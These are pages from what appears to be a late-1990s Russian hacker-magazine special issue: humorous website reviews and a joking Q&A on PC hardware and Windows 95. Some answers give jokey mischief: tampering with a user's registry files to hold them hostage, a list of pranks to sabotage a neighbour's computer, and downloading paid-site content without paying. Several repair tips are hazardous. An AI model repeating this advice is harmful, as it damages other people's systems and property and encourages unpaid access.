Если в гостях ты стоишь столбом, стыдливо терзая кончиком ботинка плитки паркета, если тебе предлагают присмотреть за ребенком, а ты складываешь пальцы «козой» и тычешь ею в живот несчастного семилетнего малыша, страшным голосом приговаривая: «Гули, гули, гули...», если при твоем появлении на празднике у людей вытягиваются лица и по комнате проносится шепот: «Да-а-а... Вечеринка

умерла...». Что ж, это всего навсего значит, что тебе пора бросать пить «Спрайт» и заняться, наконец, своим имиджем. Как тебе амплуа массовика-затейника?!! Что значит — «не с моей-то рожей»?!! Как говорится, главное

чтоб «душа была ароматная»! У тебя она как? Попахивает? Да?!! Нет, ближе подходить не надо — я это уже отсюда чувствую! Отлично! А начнешь ты свое перерождение с

http://if-site.com/_xdays/.

Сайт «Массовик-затейник» сделает тебя душой общества. Здесь можно найти советы, чем развлечь гостей, маленьких и больших. На каждый календарный праздник у тебя всегда будут готовы советы и пожелания! Даже в стихах! На свадьбах тамада будет обреченно рыдать в углу, поскольку на него никто не будет обращать внимания, а на днях рождения тебе будут рады больше, чем новорожденному.


Спецвыпуск хакер, номер #001, стр. 001-110-9, WWW

WWW

Спецвыпуск хакер, номер #001, стр. 001-110-9

Тебе предстоит испытать шок, узнав, что главное в хорошем застолье — это не тогда, когда ты, наконец, засыпаешь, уронив голову в тарелку салата, а красивый и вовремя сказанный тост! Не веришь? А придется! Повторяй за мной: «Давайте выпьем за хороших людей: нас так мало осталось...»

«Массовик-затейник», Господа!

P.S. Если кто захочет поделиться ссылками на интересные программы или на сайты, заслуживающие внимания, пишите. Ответ не гарантирую, но прочту обязательно.

Фоторобот

http://www.play.ru/photo

/index.htm

Это не страничка, а «просто праздник какой-то» для всех начинающих детективов, наблюдательных соседей или сердобольных кумушек. А так же для всех тех, кто не обладает фотоаппаратом, но зато имеет горячее желание узнать что-то вроде: «А кто ж это третьего дня в два часа ночи сиганул в Галькино окно... И муж-то ее уже месяц как в командировке... Непорядок!»

Теперь, родные мои, вам достаточно будет пристальней вглядеться в злоумышленника, а потом найти подключенный к Интернету компьютер и набрать заветный URL. На появившейся страничке вы можете выбрать необходимые волосы, лоб, брови, глаза и т.д. И через несколько минут портрет негодяя у вас в руках!

Но самое приятное, что теперь совершенно анонимно вы можете послать полученный рисунок в Интерпол, МВД или..., если слово гуманность — для вас пустой звук, то и Галькиному мужу! Эта дополнительная услуга осуществляется Фотороботом совершенно бесплатно!

Те, кто «желает большего», могут подняться этажом выше на http://www.play.ru/


Спецвыпуск хакер, номер #001, стр. 001-118-1, Можно ли программно увеличить

Можно ли программно увеличить

скорость связи

Спецвыпуск хакер, номер #001, стр. 001-118-1

с Интернет?

:

Сейчас развелось много программных «ускорителей» коннекта. Поскольку протокол TCP/IP разработан как универсальный, он не очень эффективен. Сейчас из Сети можно скачать небольшие подлые программки, которые переделывают протокол под ваши конкретные нужды. После модернизации TCP/IP скорость повышается до 58% от начальной. Такие программы можно найти практически на любом халявном сайте, но есть опасность подцепить вирус вмести с бесплатной программой.

Какие преимущества дает новый формат ATX?

:

Этот формат материнской платы был специально сделан для того, чтобы упростить update.

Он обладает рядом преимуществ:

– более простой монтаж платы в корпус (как будто ты ее туда-сюда дергать будешь).

– нельзя перепутать коннекторы питания (как в Baby AT) и тем самым сжечь плату.

– почти все ATX — ные блоки питания умеют «засыпать» (сильно храпят).

Есть и недостатки:

– вентилятор у ATX дует внутрь, значит, вся пыль набивается в компьютер. Зато сэкономишь на пылесосе.

– стоит дороже и несовместим со старыми форматами.

Что делать, если

я забыл пароль

в BIOS’е?

:

Выкинуть компьютер из окна. Если есть перемычка «сброс BIOS», то нужно ее вынуть и снова вставить (обычно бывает на современных платах). Если перемычки нет, то вынь батарейку. Если батарейка припаяна или интегрирована в чип, то остается замкнуть ножки микросхемы отверткой. Будь готов к тому, что после этого придется менять всю «мать». Один мой друг так сделал — и ничего, работает — повезло.

Как уберечься

от вируса,

заражающего BIOS?

:

Такой вирус может быть опасен только для плат с FLASH ROM (возможностью замены прошивки BIOS). И то при разрешенной перепрошивке с помощью перемычки. Но если вирус все же проберется, то восстановить «мать» вряд ли удастся. Собрался менять прошивку BIOS (зачем — непонятно)? Скачал новую с какого-то сомнительного сайта в Интернете? Прекрасно, скоро ты сможешь использовать обновленный компьютер для хранения картошки, например.

Как изменить заставку перед загрузкой WINDOWS’95?

:

В корневом каталоге загрузочного диска (обычно это диск С) есть файл logo.sys. Просто переименовываешь его расширение в logo.bmp. Это обычная картинка, в которую ты можешь вставить Necrosoft или рожу Билла Гейтса, подрисовав ему сопли. Только не забудь, что эта картинка должна быть с размерами 320х400 и с палитрой 256 цветов. И когда будешь рисовать, учти, что при загрузке рисунок растянется до размеров 640х480. Когда ты сделаешь своё грязное дело, сохраняй файл как «16-битный рисунок BMP». После осквернения заставки файл требуется переименовать обратно в logo.sys и поместить в корневую директорию. Картинки, появляющиеся при перезагрузке Виндов и «Теперь можете нажать на пимпу «Power», находятся в директории Windows и называются logos.sys и logow.sys. С пользователями старых версий Win’95 можно шутить еще круче. Щелкаешь правой кнопкой мыши по кнопке «ПУСК», выбираешь «ЗАКРЫТЬ». Мужик приходит, а кнопки «ПУСК» нету — теперь он твой раб на веки.

Для чего

нужен реестр?

:

Для мелких пакостей. Windows там настройки разные хранит. Менять может только сама система, влезть туда можно только с помощью специального редактора реестра. Но не беда! Реестр записан в файлах SYSTEM.DAT и USER.DAT — это обычные бинарные файлы в каталоге системы. Скопируй на дискетку и подправь оригиналы. Без этих файлов все придется переустанавливать. Глупый юзер тебе за эту дискетку душу продаст.


Спецвыпуск хакер, номер #001, стр. 001-118-2, Можно ли программно увеличить

Можно ли программно увеличить

скорость связи

Спецвыпуск хакер, номер #001, стр. 001-118-2

Как прочитать поцарапанный CD диск?

:

Царапанные компакт-диски моют с мылом и после этого они читаются намного лучше, так можно прочесть какой угодно диск. Еще можно их чистить зубной пастой или порошком, только не забудь про кислотно-щелочной баланс. Делать это мягкими материалами или руками. Если ты начнешь тереть диск наждачкой или зальешь крутым кипятком, то я не виноват.

CD-ROM совсем

не читает диски.

Как его починить?

:

Если руки растут, откуда надо, то попробуй разобрать дисковод и протереть линзу салфеткой. У одного мужика линза вовсе отвалилась, так он ее приклеил, вроде работает. Еще ты можешь наткнуться на какие-нибудь механические неисправности типа шестеренку заклинило или волосы на штифт намотались. Проверь, не отошел ли шлейф. Если за руки стыдно, то купи чистящий диск или поставь пиво специалисту.

Что дает изменение прошивки у модема?

:

Пожизненный геморрой. У одного мужика был внешний Sporster. После замены прошивки внешний Sporster стал думать, что он внутренний Courier. Другой перепрошил свой 33 600 на 56 К и никак не может понять, почему модем не хочет на эту скорость коннектиться. Прошитый модем говорит, что номер телефона научился определять и много новых полезных функций приобрел, но пока еще этого никто не видел. Так что чем у модема прошивка роднее, тем честнее он

работает.

Что такое

стереоочки и чем они

от шлема отличаются?

:

Через стереоочки можно смотреть специальные стерео объекты на обычном мониторе, например, сможешь поиграть в Comanche3 в стерео-режиме. Сами очки просто меняют цвет стекол, создавая ощущение объема. Они стоят дешевле шлема, но у них куча недостатков. Можно смотреть только специально сделанные программы, в простые игры с ними не поиграешь — изображение нечеткое. Шлем имеет два цветных ЖК монитора, а также детекторы движения головы, в нем в любую 3D-игру резаться можно с полным ощущением объема. Но если уж тебе так хочется стерео очки, то купи какую-нибудь видеокассету со стереофильмом — там обычно катронные очки прилагаются.

Что лучше купить —сканер или

цифровую камеру?

:

За 300 баксов можно купить цветной планшетный сканер или простенькую цифровушку. У сканера разрешение посильнее, зато цифровушка кучу возможностей дает. Ты своих друзей можешь снимать и не краснеть потом в пункте проявки фотографий. По Сети телеконференции устраивать. В библиотеке книжки снимать и распознавать дома на компьютере. Цифровая камера имеет обычные видеовыходы и свой винчестер. Подключаешь ее к телевизору в школе и вся твоя компания балдеет от порнухи из Интернета.

Как заземлить

компьютер?

:

Нужно протянуть шнур от электрощита (это там, где счетчик и предохранители), металлический корпус щитка всегда правильно заземлен. Ты, конечно, хочешь заземлить компьютер на батарею — заземляй — и будет фейерверк. В нашей стране в каждом доме найдется пьяный мужик в майке, который обязательно кинет фазу на батарею, чтобы меньше платить за электричество. Результат: был процессор, стал генератор вольтовой дуги.


Спецвыпуск хакер, номер #001, стр. 001-118-3, Можно ли программно увеличить

Можно ли программно увеличить

скорость связи

Спецвыпуск хакер, номер #001, стр. 001-118-3

Чем отличается DIMM 10ns от 6ns?

:

Если частота шины 100Mhz, то 10-наносекундные модули памяти работают неустойчиво. Шины с такой частотой ставят к процессорам с частотой более 233Mhz. Более быстрые чипы стоят, естественно, на порядок дороже. Но использовать 10ns на первом пне можно без проблем. Естественно, 6ns сделаны намного качественней (не в хижине дядюшки Джо).

Можно ли спасти «горелый» модуль оперативки?

:

В фирму Х пришел я менять битый DIMM. И чуть со стула не упал, когда горе-продавец стал его обнюхивать. Сгоревший модуль памяти восстановить нельзя, но неработающий можно. Иногда безнадежные модули памяти кладут в морозилку, и иногда это помогает. Если они не трескаются от холода. Кроме шуток, помогает, но почему — не знаю.

Как разогнать

процессор?

:

Переставь перемычку на плат

е, соответствующую более высокой частоте процессора, мегагерц на 20 — 40. Если будут глюки, то твой процессор не гонится. Проверь, греется ли он. Обычно на более высоких частотах процессор работает менее устойчиво. Недавно у одного моего знакомого «гонщика» сгорела вместе с процессором «мать». Теперь он носится по друзьям, выпрашивая комплектующие.

Как научить компьютер понимать слова?

:

Поставь себе программу распознавания речи типа Listen или Dragon (Горыныч по-нашему). Нужен микрофон и много оперативки, не менее 32 мегов. Иначе тебе придется научиться курить: сказал слово — пошел покурил. Такая программа жрет много ресурсов, но при нормальной конфигурации она работает круто. Можно не только выполнять словесные команды, но и набирать текст в Word’е. Круто, если ты научишь ПК понимать мат, а еще круче — отвечать. Тогда всегда будет с кем побеседовать на родном языке.

Что такое пиленый процессор?

:

Ну смотри, AMD K6 233 стоит на 20 баксов дороже, чем AMD K6 200. Наши братья китайцы фишку просекли быстро. Сидят они у себя на родине и оттирают у процессоров настоящую маркировку. Так из 200 получается 233. Нам эти процы продают в подвальных магазинах, их-то и называют пилеными.

Какова

критическая

температура

процессора?

:

Если из компа валит черный дым, то он достиг «критической температуры». После 60 градусов от чипа или 40 на радиаторе начинаются глюки. Погореть в этом случае может не только камень, но и «мамка». Но такое бывает, только если ты камень гоняешь или CPU-cooler сдох (гнилые процы — отдельная история). Почти на всех PII есть термодатчик и температурная установка в «биосе». Если у тебя не «два пня», то используй обычную термопару, она к некоторым цифровым тестерам прилагается.

Делают ли еще

в нашей стране

компьютеры?

:

Конечно, только не те, что ты подумал (в метро, например — чем не компьютеры). Ну и другие спецкомпьютеры для оборонки и космоса. Небось ты еще слышал про суперкомпьютер «ЭЛЬБРУС». Подмосковный завод IBM накрылся медным тазом уже давно. Так что комплектующие для ПК делает только «Формоза». На сайте www.ixbt.ru об этом хорошо рассказано, и горячие споры в конфе.


Спецвыпуск хакер, номер #001, стр. 001-118-4, Можно ли программно увеличить

Можно ли программно увеличить

скорость связи

Спецвыпуск хакер, номер #001, стр. 001-118-4

Можно ли процом «маму» сжечь?

:

Еще как! Некоторые вы

дающиеся ламеры ухитряются его засунуть не так, вот «мать» и сгорает. Бывают, правда, бракованные процессоры, ну это зависит от того, по какому такому наследству тебе камень достался. Чаще всего в обоих случаях вылетает цепь питания. Дерзай, чини! Но паленое железо с живым не мешай, а то и остальное погорит.

Как скачать весь сайт, чтоб потом

в оффлайне

смотреть?

:

Поставь себе Offline браузер (Fatch, например). Он не только всю страницу скачает, но и с гипер-ссылками, если хочешь. Если руки растут, откуда надо, а неоткуда я подумал, то слей все нужные компоненты в одну директорию, а потом в HTML их увяжи. В обратном случае тебя спасет только 5-ый Must Die Explorer. Или поставь себе прогу типа Black Widow. Эта прога позволяет выкачать хоть весь сервер, а потом просматривать его в оффлайне. Причем ссылки она поменяет сама. Кстати, эта прога также хороша для выкачивания директорий с порно-серверов, на которые вход платный. Для Black Widow это не помеха.

Что делает сетевой фильтр?

:

Любой сетевой фильтр подавляет высокочастотные помехи, от которых глюки. Предотвращает скачки в сети, которые железо портят. Все это ты можешь посмотреть на осциллографе очень наглядно. Но не обязательно покупать дорогие импортные. Есть отечественные стабилизаторы, соответствующие ГОСТцу, в основном лабораторные. На худой конец можно спаять самому, ведь там всего лишь пара дросселей и конденсаторы. Только не путай сетевые фильтры с Back UPS’ами. В случае отключения электричества сетевой фильтр не поможет. Он только снимает высокочастотные помехи, но не продолжает питать комп, отключенный от Сети.

Как восстановить мышь?

:

Во-первых, разбери ее всю и вымой с мылом, а потом высуши. Я надеюсь, у тебя хватит мозгов, чтоб главную плату оставить без водных процедур. Во-вторых, в мышах горят обычно оптотроны и ломаются выключатели. Если мышь кликается плохо, то просто перепаяй кнопку с другой, желательно с такой же. Если проблемы с движением курсора, то виноваты оптотроны — элементы, в которых шестереночка вращается, их тоже можно перепаять. Если ничего не помогает, то можешь привязать мышь к своему ранцу, а шариком играть с друзьями в футбол. Но обычно из двух нерабочих мышаков легко собрать одну рабочую. Ну а про то, что мышки нормальные люди чистят хоть изредка, я молчу. Надеюсь, что ты это и так знаешь.

Можно ли самостоятельно заправить картридж для

лазерного принтера?

:

Можно, но приготовься к тому, что в порошке будет вся окружающая среда.

1) купи новый порошок, именно для лазерного принтера.

2) исследуй картридж, открой его и удали оттуда уже использованный.

3) засыпь новый порошок.

Неспециалисту очень сложно бывает справиться с замочками на картридже, это самая крутая головоломка. Главное — не применяй силу, чтобы не сломать пластмассовые детали. Иначе придется покупать целый картридж.


Спецвыпуск хакер, номер #001, стр. 001-118-5, Можно ли программно увеличить

Можно ли программно увеличить

скорость связи

Спецвыпуск хакер, номер #001, стр. 001-118-5

Можно ли «дедовским способом»

заправить картридж матричного

принтера?

:

Только если собрался выбрасывать принтер. Намного дешевле купить новую ленту и заправить ее в картридж, она стоит прядка 5 рублей. Неужели тебе нужен весь это геморрой, если новая лента стоит дешевле твоего любимого

«Сникерса»?

Как напакостить

соседскому

компьютеру?

:

– заклеить RESET скотчем.

– поменять местами клавиши (они очень просто снимаются, если подцепить чем-то острым).

– перекрыть ключом клавиатуру.

– свистнуть шарик из мыши.

– переключить мышь с 2-кнопочной на 3-кнопочную (жуткие глюки в WINDOWS)

– насовать бумажек в дисковод и заклеить пластилином.

– намазать кнопку POUER чем-то липким.

И самый простой способ. Вынь мышь из COM порта. Многие тормоза будут долго думать, почему курсор мыши на экране есть, но не бегает. Будут ручками настройки пытаться поменять.

Присылай свои способы — обязательно напечатаем!!!

Где найти переходник с AGP/PCI?

:

А где найти переходник с 220/телефон? Баклан, ты что болен? AGP — это специальный графический порт. Пытаться подключить AGP видеоадаптер к PCI шине через переходник — это то же, что подключать кипятильник к холодильнику.

Что делать, если моя АТС тоновый

набор не поддерживает?

Пользоваться импульсным. Но может быть так, что дядьки, что на АТС сидят, от тебя эту возможность всеми силами скрывают. Тогда нужно туда пойти или позвонить. Если АТС вообще на это способна, то за умеренную плату они тебе его подключат (вряд ли это будет бесплатно). И запомни, если у тебя АТС цифровая, то она ОБЯЗАНА поддерживать тоновый набор. Иди к дядькам и проси включить. Но главное — не проболтайся, что у тебя модем есть — платить заставят!!! Зато ты ощутишь все преимущества, когда дозвон в Сеть у тебя будет за 15 секунд.

Почему у меня

сигнал в модеме очень тихий?

:

Если модем висит на линии один, то слишком большой ток перегружает линию. В таких случаях обычно ставят небольшой резистор, последовательно с модемом, но так, чтобы хорошо ловился busy. Модемы достаточно чувствительные, так что сильный ток для них тоже вреден. Спасает параллельный телефон (желательно старый, дисковый). Если так не предохраняться, то иногда телефон просто перестает работать. А когда звонишь на АТС, там спрашивают: а нет ли у тебя модема? Догадливые, черти.

Как уменьшить

помехи

в телефонной сети?

:

Все сильно зависит от качества АТС, с которой соединяешься. Ты можешь, конечно, паять всякие фильтры, скачанные с FIDO NET. Но максимальный эффект будет, если ты протянешь новый провод прямо от щитка и до компьютера. Чтобы не было никаких «соплей» и лишних розеток. Лучше, если провод будет целиковым и экранированным.

Что делать с мертвыми дискетами?

:

Если совсем никак не удается восстановить дискету, не выбрасывай ее!!!

Она может прослужить тебе подставкой для заварочного чайника. Из нее можно сделать потайную коробочку, в которой ты будешь прятать деньги и презервативы. Чтобы враг не догадался. Или повесить на рюкзак. Все будут считать тебя кул хацкером.


Спецвыпуск хакер, номер #001, стр. 001-118-6, Можно ли программно увеличить

Можно ли программно увеличить

скорость связи

Спецвыпуск хакер, номер #001, стр. 001-118-6

Что такое USB?

:

Universal Serial Bus — универсальная последовательная шина. Ее сделали, чтобы облегчить ламерству жизнь. Теперь ламер сможет втыкать туда наушники, модемы, принтеры, сканеры, цифровые камеры для телеконференций. Все это — в один штепсель, до 127 устройств. Получается нечто типа локальной сети между периферийными устройствами. Включать и отключать устройства можно без перезагрузки. Значительно упрощается настройка конфигурации.

Почему при разгоне проца винт бэдами покрывается?

:

...а лицо прыщами. Из-за нестандартной частоты на шине контроллер глючить начинает. В основном, на запись, при этом бэды получаются как бы логические. Т.е. поверхность цела, а Scandisk все равно бедовые блоки находит. Но самое страшное, что если такая ошибочка в FAT запишется, то винт можно считать мертвым. Иногда от логических бэдов может помочь форматирование винта на нормальной частоте. Правда, такие глюки бывают не всегда, все сильно зависит от «матери» (то бишь встроенного в нее контроллера) и самого HDD.

Как подключить винт через LPT?

:

Самому это сделать трудно, т. к. схема достаточно сложная. Можно купить в центре техподдержки или на радиорынке специальный кейс для HDD на LPT. Но для чего тебе надо спину ногой чесать? LPT — это масса проблем, питание к винту подводить от внешнего источника придется. А это очень плохо скажется на его работе. Не всякий BIOS такой винт определить способен. И с драйверами ты так намучаешься, что от злости этот кейс в сортире утопишь. Или с балкона в космос запустишь — туда ему и дорога...

Что такое съемный винчестер?

:

Эта штука, которая способна облегчить жизнь тебе и твоим друзьям. Обычный винт устанавливается в небольшую коробочку. Вместе с коробочкой продаются салазки, которые в системный блок монтируются. И у тебя получается много гигабайтная дискетка! Накачал порнухи с Сети, достаешь винт и идешь к приятелю. Чтобы враг винт не стянул, есть замочек, а ключик у тебя на шее. Поклонники всяких стримеров и накопителей отдыхают, салазки стоят 10 баксов.

Что такое

программатор?

:

Пьяный программист, беседующий с трансформаторной будкой. Сейчас почти все ПЗУ (постоянно запоминающие устройства, BIOS, например) имеют возможность перезаписи. Некоторые можно перепрошивать «на лету», т.е. программно, не извлекая микросхему из компьютера (BIOS видеокарты, модема и пр.). Но если во время перепрошивки возникнет серьезная ошибка или злобный вирус просочится, то программно BIOS уже не изменишь! И для восстановления нужен программатор ПЗУ. Современные устройства (на которые твоих денег не хватит) можно подключить к компьютеру, и на нем прошить микросхему BIOS’а. Но реально ты сможешь найти только какой-нибудь совковый программатор размером с телевизор, прошивку в который придется вводить вручную в машинном коде (см. «Что такое геморрой?»).

Как правильно

охлаждать процессор?

:

– Не покупай левых CPU cooler’ов. Радиатор с вентилятором (cooler) рассчитываются по трехэтажным четырехстраничным формулам, которые всяким китайцам и не снились. С учетом мощности камня.


Спецвыпуск хакер, номер #001, стр. 001-118-7, Можно ли программно увеличить

Можно ли программно увеличить

скорость связи

Спецвыпуск хакер, номер #001, стр. 001-118-7

– Между самим чипом и радиатором должен быть тонкий теплопроводящий слой: термопаста, термопленка или парафин на худой конец. Все это покупают в техцентрах или на радиорынках (парафин в виде свечек, конечно, не путать с анальными анальгиновыми).

– Не допускай попадания шлейфа в вентилятор.

Если тебе на все это наплевать, то хочу тебя предупредить, что сгоревший камень часто жжет и «мамку». Ну а процы в основном горят от перегрева и кривых рук.

На кой мне гнезда

в планшетном

сканере?

:

Видимо, к твоему сканеру можно подключить устройства разные. Автоматическую подачу бумаги или приставку для сканирования фотопленки. Но такие устройства стоят обычно в 3 раза дороже, чем сам сканер. И зачем тебе они — лучше купи рукоотбивалку Panasonic. Чтобы сволочи, которые лапают своими жирными пальцами стекло на сканере, сразу получали по рукам.

Почему

винт

герметичный?

:

Чтобы, когда пьяный саппорт заливает водкой сервак, пользовательская информация сохранялась. Если ты думаешь, что это необходимо для того, чтобы в винт не набивалась пыль с крошками, ты, конечно, прав отчасти. Но для этого необязательна полная герметичность. Скорее, тут дело в перепадах влажности, которые могут сильно повредить как работе механической части, так и поверхности блинов.

Что

такое

геморрой?

:

Да, распространенное словечко. Факт. А вот что оно значит? Цитирую куски из медсправочника бабушки-врача:

«Патогенез. Геморрой развивается как при наследственном предрасположении, так и при запорах и профессиональных вредностях — сидячем труде...» (ну держитесь, хакеры!)

«Симптомы. Зуд и жжение около заднего прохода, повторные кровотечения при испражнении» (чувствуешь???).

«Течение. Развивается преимущественно во второй половине жизни, но наблюдается и в молодом возрасте, даже у детей» (к слову о компьютерном воспитании детей).

«Осложнения. Выпадение кишок при испражнении и наружное их ущемление; это состояние очень мучительное и небезопасное для жизни» (жизнью рискуем!).

«Распознавание. Не представляет никакого труда; при натуживании больного венозные опухоли вываливаются через задний проход и видимы на глаз» (ну что, наложил в штаны, студент?).

«Лечение. Хирургическим путем».

Что такое ACPI?

:

Расширенная конфигурация и спецификация интерфейса питания (Advanced Configuration & Power Interface Specification). Операционка с APCI (APCI OS) должна брать на себя функции PnP и APM BIOS (Advanced Power Management). Этот интерфейс позволяет программно управлять как всей системой, так и отдельными ее частями:

– спящий и бодрствующий режим питания.

– частичное засыпание процессора и его термоконтроль.

– термоконтроль и термоуправление всеми частями системы, предполагается установка термодатчиков (на мышку в том числе).

– засыпание свободных портов ввода-вывода и просыпание при подключении к ним устройств PnP, контроль за храпением портов ввода-вывода.

– расширенное управление батарейкой (в ноутбуках).

Чем отличается обычный format

от low level format?

:

Низкоуровневое форматирование (LLF) винчестера — это разметка информационных секторов. Все современные харды продаются уже отформатированными на низком уровне, а иногда уже загаженными. Обычное форматирование — создание файловой структуры и разбивка на области. При появлении бэдовых блоков на поверхности (не логических) LLF может «закрыть» бэды, перераспределив информсекторы на здоровую поверхность. Но бэды никуда не денутся! Для сказевого винта LLF — стандартная операция, а для айдишных нужна специальная программа! Скачивать ее с Сети-то же, что загружаться с вирусной дискеты.


Спецвыпуск хакер, номер #001, стр. 001-118-8, Можно ли программно увеличить

Можно ли программно увеличить

скорость связи

Спецвыпуск хакер, номер #001, стр. 001-118-8

С какой максимальной емкостью памяти способен работать ПК?

:

С любой, и Интернет тому пример. К ПК подключали и терабайтные накопители, все работает, ограничения только в скорости. Возникают некоторые проблемы с BIOS, вполне разрешимые. Но обычно проблемы не с избытком места, а с его недостатком. Современной цифровой студии для 180 минут качественного звука нужен 1 гигабайт. Ограничения у ПК только с кэшем и оперативкой, это связано с возможностями чипсета и способом установки модулей памяти. В два слота 500 мегов не вставишь. На профессиональных станциях типа SUN такие проблемы решены. Но ПК до станции еще далеко.

Какие колонки

круче?

:

Все компьютерные колонки страдают одними болезнями:

– дорогие.

– некачественные усилители, слабые динамики, а следовательно, звук неестественный.

– дополнительные подлости от фирмы-производителя: это короткий шнур, внешний блок питания и ручки регулировки в самых неожиданных местах.

– обычно колонки в той или иной форме захламляют твое рабочее место.

Если ты видел колонки, которые не страдают хотя бы двумя из этих болезней, то расскажи о них мне. Но вот если ты подключишь комп к старому русскому усилку, надыбанному с помойки, или к твоему современному HI-FI центру... Тогда ты поймешь, что колонки для компьютера придумал сосед, стучащий по батарее во время твоих кваковых баталий.

Как почистить

головку у матричного принтера?

:

Приготовься к тому, что принтером придется пожертвовать. Сними головку. Для этого не требуется никаких усилий, если усилия все-таки потребовались, то назад ты ее уже не вставишь. Развинчивай ее очень аккуратно, над белым листом бумаги. Все иголочки там на пружинках. Запомни, куда выходит каждая иголочка, иначе принтер превратится в плохую шифровальную машину. Вынь иголочки с электромагнитами и другие съемные детальки. Промой головку водой и просуши ее. Желаю тебе собрать все это назад.

Что такое UPS?

:

Блок бесперебойного питания (Uninterrupted Power System). «Умный» аккумулятор дает некоторую независимость от фокусов Мос-, Рос- и пр. Энерго. Постоянно пополняет заряд своих батарей. Умеет вести график своего включения\выключения. Те, которые имеют в названии pro, умеют еще компенсировать опасные скачки напряжения. Стоят они бешеных бабок. Зато даже когда во всей нашей стране из-за кризиса отключат электричество, ты все равно сможешь еще некоторое время резаться в твою любимую игрушку. Можешь еще купить себе солнечную батарею, спутниковый телефон с пожизненным доступом в Интернет и вообще плюнуть на то, что происходит в нашей стране. UPS в 400-500 ВА (Вольт Ампер) покроют потребности любого компьютера с монитором. Реально хватает ~350 ВА.


Спецвыпуск хакер, номер #001, стр. 001-118-9, Можно ли программно увеличить

Можно ли программно увеличить

скорость связи

Спецвыпуск хакер, номер #001, стр. 001-118-9

Стоит ли покупать FM и TV tuner?

:

Стоит. У меня стоит и FM tuner, и TV tuner. Первый удобен тем, что не нужно захламлять стол всякими музыкальными центрами или приемниками. Все внутри компа. А маленькая программка тянет сигнал с платы, причем умеет запоминать 18 станций, искать станции (даже тонкой подстройкой), да еще и имеет таймер и будильник. Вот когда у меня компьютер работал круглые сутки, FM tuner меня будил, врубая 106.8 FM на полную громкость.

TV tuner удобен по 2 причинам. Первое: телевизор на стол ставить не надо, а значит, остается место для пепельницы и чашки кофе. Второе: очень удобно заниматься своими делами и в углу экрана еще и новости посматривать. Хотя потом можно откинуться в кресло и посмотреть свой любимый фильм на полном экране. Причем качество будет намного лучше, чем на обычном TV. Монитор все-таки, а не трубка телевизионная. Только я купил TV tuner без пульта, и поэтому когда лежу на диване, приходится вставать, подходить к компу и переключать программы. Поэтому ты это учти и себе бери с пультом. И еще одна вещь. У некоторых людей TV tuner принимает хуже, чем обычный телевизор, потому как винт, процессор и весь остальной хлам внутри компа создают помехи. Навороченный тюнер с пультом стоит ~90 баксов, а так они от 50 до 120. Есть много разных моделей. Те, которые с пультом, — remote control. Есть спаренные с SVGA картой. Некоторые спаривают с радиотюнерами. Самые полезные тюнеры с некоторыми возможностями видеобластера (с видеовходом) — самые дорогие.

Что нужно менять для апгрейда с первого на второй пень?

:

– процессор, само собой.

– мать тоже, т.к. мамка для первого пня второй пень не держит.

– возможно, придется менять источник питания на ATX.

– видеоадаптер на AGP.

– оперативку на DIMM (если у тебя стоят SIMM).

На некоторых обычных пентиумах уже стоят AGP, ATX. А если на шине 100 мегагерц, то нужно покупать DIMM 6,8 ns, на пнях обычно стоят 10 ns.

Что такое форм

фактор?

:

Форм фактор — это тип материнской платы, в характеристики которого входят:

– габаритные размеры платы.

– способ расположения на ней слотов и разъемов.

– совместимость с источниками питания и обдувание частей вентиляторами.

От форм фактора «мамки» зависит нужный тип блока питания, размеры и положение корпуса (стоячее, лежачее и сидячее). Некоторые «мамы» бывают гермафродитными, т.е. совместимы практически со всем. А некоторые вовсе кривые (нестандартные) влезают только в свои родные корпуса и ни в какие другие. Некоторые невозможно поставить вовсе никуда. Основные форм факторы — AT и ATX. АТ умер совсем, т.к. он не влезет ни в один из современных корпусов. Место его потомка Baby-AT скоро займет ATX. Intel вводит новый форм фактор NLX, новая «мамка» будет втыкаться в корпус, как обычная плата расширения. Это сильно упростит жизнь ламерству.

Отчего шумит винчестер?

:

Ход головок вызывает щелканье. Оно особенно слышно, если винт изготовлен в каменном веке. Новенькие HDD работают практически бесшумно. Если новый винт шумит, то, вероятно, он не тот, за кого себя выдает. Он может быть бракованным, или ты успел уронить его со шкафа (что он делал на шкафу?). Но чаще всего виноваты кривые руки. Хард у тебя висит на одном винте (шурупе), а корпус склеен скотчем и вот-вот развалится? Естественно, трепыхания жесткого диска резонируют с корпусом и вызывают дребезг, урчание, сопение (в особых случаях улавливаются матерные интонации).


Спецвыпуск хакер, номер #001, стр. 001-118-10, Можно ли программно увеличить

Можно ли программно увеличить

скорость связи

Спецвыпуск хакер, номер #001, стр. 001-118-10

Что такое subwoofer?

:

Если дословно, то это низкочастотный динамик. Но реально это особый блок, продающийся с хорошими компьютерными колонками, где находится блок питания и усилитель. Он повышает качество звучания твоей стереосистемы. Низкие частоты особенно полезны для имитации взрывов. А встроенный блок питания позволяет развивать большую мощность усилителя. Так что квартиры в твоем подъезде сильно подешевеют.

Что такое пишущий CD-ROM?

:

CD-дисковод, который умеет записывать диски. Не покупай стой-дисководы - это дешевая подделка. Стоят они ощутимо дороже обычных сидиромов. Да толку в них мало. Диск ты можешь перезаписать только один или два раза. Если у тебя забит винчестер, то лучший выход — купить съемный магнитный накопитель типа Джаза или Зипа. Если ты собрался распространять пиратские программы, то дешевле напечатать диски в специальной типографии.

Что такое

транковая связь?

:

Радиосвязь, похожая по принципам на сотовую. Главное отличие в том, что абоненты могут соединяться между собой в рамках этой сети. Естественно, такая радиосистема может иметь выход в городскую телефонную линию. Такая связь намного дешевле сотовой. Ею пользуются многие организации, например, такси. Намного дешевле для доступа в Интернет с ноутбука использовать именно транкинг, а не сотовый телефон. Тем более что сам провайдер может организовать качественный радиоканал.

Как выпаять

микросхему?

:

Ну зачем тебе паять микросхему? Многовековой опыт показывает, что device (устройство), из которого ничего не выпаивали, работает лучше. Если тебе нужно просто освободить место на плате, то лучше откуси ножки кусачками. Ты хочешь, чтобы микросхема еще и работала? Есть два способа:

1) Купи или сделай насадку на паяльник. Насадка должна одновременно нагревать все ножки микросхемы. Цепляй ее отверткой поочередно с разных концов и вынимай из платы. Занятие нервное и долгое, после того как сломаешь парочку чипов пополам, выпей валерьяночки и начинай сначала.

2) Купи компрессор или отсос (не то, что ты подумал) для олова. Нагревай каждую ножку и отсасывай оттуда припой. Потом просто вынь микросхему. Паяльник с отсосом стоит дешево. Но рычаг отсоса часто норовит вылететь в глаз, зуб и пр. Так что оптимальный выбор - это компрессор. Если помозговать, то из обычного пылесоса выйдет крутой компрессор (осталось объяснить это другим членам твоей семьи). Олово можно вытряхивать из гнезда резким движением руки. Правда, на 50 ноге ты можешь разбить плату об пол.


